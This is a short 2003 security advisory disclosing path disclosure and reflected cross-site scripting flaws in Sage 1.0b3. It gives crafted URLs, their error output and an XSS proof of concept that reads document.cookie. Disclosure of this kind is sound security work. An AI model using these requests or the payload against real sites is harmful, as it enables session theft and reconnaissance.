=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= topic: XSS and Path Disclosure in Sage product: Sage 1.0b3 vendor: http://sage.dev.box.sk/ risk: middle date: 02/20/2k3 discovered by: euronymous /f0kp /r00tc0de advisory urls: http://f0kp.iplus.ru/bz/015.en.txt http://f0kp.iplus.ru/bz/015.ru.txt =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= description ----------- 1) path disclosure u can view full system path with two ways: http://hostname/?mod=some_thing&op=browse where `some_thing' is a nonexistent module name =================================================== Fatal error: Cannot instantiate non-existent class: module_some_thing in /home/aztek/libraries/module.inc.php on line 62 =================================================== other method is: http://hostname/?mod=node&nid=some_thing&op=view =================================================== Access Denied /home/aztek/modules/node.module.php:71 =================================================== 2) cross-site scripting becouse $mod is not checks correctly, u can to insert html, javascript, etc in script output: http://hostname/?mod=<script>alert(document.cookie)</script>&op=browse shouts: r00tc0de.net, DWC, DHG, security.nnov.ru, all russian security guyz!! and kate for being a kewl girl )) fsck_off: slavomira and other dirty ppl in *.kz ================ im not a lame, not yet a hacker ================
